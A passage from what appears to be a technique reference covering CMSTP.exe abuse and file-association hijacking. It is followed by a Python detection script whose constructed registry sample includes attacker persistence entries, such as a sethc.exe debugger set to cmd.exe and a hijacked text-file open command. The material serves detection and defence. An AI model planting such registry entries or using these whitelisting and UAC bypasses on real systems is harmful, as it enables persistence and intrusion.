CMSTP +The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles.[[CiteRef::Microsoft Connection Manager Oct 2009]] CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands.[[CiteRef::Twitter CMSTP Usage Jan 2018]] Similar to [[Technique/T1117|Regsvr32]] / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs[[CiteRef::MSitPros CMSTP Aug 2017]] and/or COM scriptlets (SCT) from remote servers.[[CiteRef::Twitter CMSTP Jan 2018]][[CiteRef::GitHub Ultimate AppLocker Bypass List]] This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application. CMSTP.exe can also be abused to [[Technique/T1088|Bypass User Account Control]] and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.[[CiteRef::MSitPros CMSTP Aug 2017]][[CiteRef::GitHub Ultimate AppLocker Bypass List]]  +
Change Default File Association +When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access.[[CiteRef::Microsoft Change Default Programs]][[CiteRef::Microsoft File Handlers]] Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. System file associations are listed under <code>HKEY_CLASSES_ROOT\.[extension]</code>, for example <code>HKEY_CLASSES_ROOT\.txt</code>. The entries point to a handler for that extension located at <code>HKEY_CLASSES_ROOT\[handler]</code>. The various commands are then listed as subkeys underneath the shell key at <code>HKEY_CLASSES_ROOT\[handler]\shell\[action]\command</code>. For example:
*<code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code>
*<code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code>
*<code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to execute arbitrary commands.  +
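Five of the entries above (Accessibility Features via the debugger method, AppCert DLLs, AppInit DLLs, Authentication Package, and Change Default File Association) are all Registry-resident, so a single pass over a <code>reg export</code> of the relevant hives covers them. The following is an added example (not from the original page) that parses the <code>Windows Registry Editor Version 5.00</code> export format, including the <code>hex(7)</code> encoding that <code>Authentication Packages</code> (a REG_MULTI_SZ) is exported as and its backslash line continuations, and reports entries matching each technique. The sample export is constructed; the Image File Execution Options key is the one the debugger method uses; the allowlist of trusted handler locations and the baseline of <code>msv1_0</code> as the only stock authentication package are assumptions to adjust for a given estate.

```python
"""Hunt a Windows .reg export for the persistence locations described on this page.

Added example with a constructed export; not part of the original page.
"""
import re
from typing import Dict, List, Tuple

RegKeys = Dict[str, Dict[str, object]]

# Accessibility binaries launched from the logon screen (from the list above).
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
                          "narrator.exe", "displayswitch.exe", "atbroker.exe"}
# Assumption: handlers living here are what a stock install points file associations at.
TRUSTED_HANDLER_PREFIX = re.compile(r'^"?(%systemroot%|%programfiles%|c:\\windows\\|c:\\program files)', re.I)

# Constructed sample export: benign entries next to one hit per technique.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="vsjitdebugger.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"inject"="C:\\ProgramData\\appcert.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\ProgramData\\hook.dll"
"LoadAppInit_DLLs"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Authentication Packages"=hex(7):6d,00,73,00,76,00,31,00,5f,00,30,00,00,00,65,00,\
  76,00,69,00,6c,00,70,00,6b,00,67,00,00,00,00,00

[HKEY_CLASSES_ROOT\txtfile\shell\print\command]
@="%SystemRoot%\\system32\\NOTEPAD.EXE /p %1"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="\"C:\\Users\\Public\\svchost.exe\" \"%1\""
"""


def _decode(raw: str) -> object:
    """Decode the right-hand side of a .reg value line (quoted string, dword, or hex blob)."""
    raw = raw.strip()
    if raw.startswith('"') and raw.endswith('"'):
        return re.sub(r"\\(.)", r"\1", raw[1:-1])  # .reg escapes \ and " with a backslash
    if raw.startswith("dword:"):
        return int(raw[len("dword:"):], 16)
    m = re.match(r"hex(?:\((\d+)\))?:(.*)$", raw)
    if m:
        data = bytes(int(b, 16) for b in m.group(2).split(",") if b.strip())
        if m.group(1) == "7":  # REG_MULTI_SZ: NUL-separated UTF-16LE strings, double-NUL terminated
            return [s for s in data.decode("utf-16-le").split("\x00") if s]
        return data
    return raw


def parse_reg_export(text: str) -> RegKeys:
    """Parse a 'Windows Registry Editor Version 5.00' export into {key: {value_name: value}}."""
    keys: RegKeys = {}
    current = None
    pending = None  # (name, partial text) while a hex value continues over '\'-terminated lines
    value_re = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')
    for line in text.splitlines():
        line = line.strip()
        if pending is not None:
            name, acc = pending
            acc += line
            if acc.endswith("\\"):
                pending = (name, acc[:-1])
            else:
                keys[current][name] = _decode(acc)
                pending = None
            continue
        if not line or line.startswith(("Windows Registry Editor", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = value_re.match(line)
        if m is None or current is None:
            continue
        name = "(Default)" if m.group(1) == "@" else re.sub(r"\\(.)", r"\1", m.group(1)[1:-1])
        raw = m.group(2)
        if raw.endswith("\\"):
            pending = (name, raw[:-1])
        else:
            keys[current][name] = _decode(raw)
    return keys


def hunt(keys: RegKeys) -> List[Tuple[str, str, str]]:
    """Return (technique, key, detail) for each entry matching one of the page's persistence locations."""
    findings = []
    for key, values in keys.items():
        k = key.lower()
        if "\\image file execution options\\" in k and "Debugger" in values:
            if key.rsplit("\\", 1)[-1].lower() in ACCESSIBILITY_BINARIES:
                findings.append(("accessibility-debugger", key, str(values["Debugger"])))
        if k.endswith("\\session manager\\appcertdlls"):
            for name, dll in values.items():
                findings.append(("appcert-dll", key, f"{name}={dll}"))
        if k.endswith("\\windows nt\\currentversion\\windows") and values.get("AppInit_DLLs"):
            loaded = values.get("LoadAppInit_DLLs", 0)
            findings.append(("appinit-dll", key, f"{values['AppInit_DLLs']} (LoadAppInit_DLLs={loaded})"))
        if k.endswith("\\control\\lsa"):
            pkgs = values.get("Authentication Packages", [])
            for pkg in ([pkgs] if isinstance(pkgs, str) else pkgs):
                if pkg.lower() != "msv1_0":  # assumption: msv1_0 is the only stock package
                    findings.append(("lsa-auth-package", key, pkg))
        if re.search(r"\\shell\\[^\\]+\\command$", k):
            cmd = str(values.get("(Default)", ""))
            if cmd and not TRUSTED_HANDLER_PREFIX.match(cmd):
                findings.append(("file-association", key, cmd))
    return findings


if __name__ == "__main__":
    for technique, key, detail in hunt(parse_reg_export(SAMPLE_REG)):
        print(f"[{technique}] {key} -> {detail}")
```

To produce real input, export the hives with <code>reg export HKLM\SOFTWARE software.reg</code>, <code>reg export HKLM\SYSTEM system.reg</code> and <code>reg export HKCR classes.reg</code> and concatenate them; the parser ignores the header lines and comments. Because the Windows 8 and later check disables AppInit DLLs under Secure Boot, an <code>appinit-dll</code> finding on such a host points at a modification rather than a working load path, but it is still evidence of tampering.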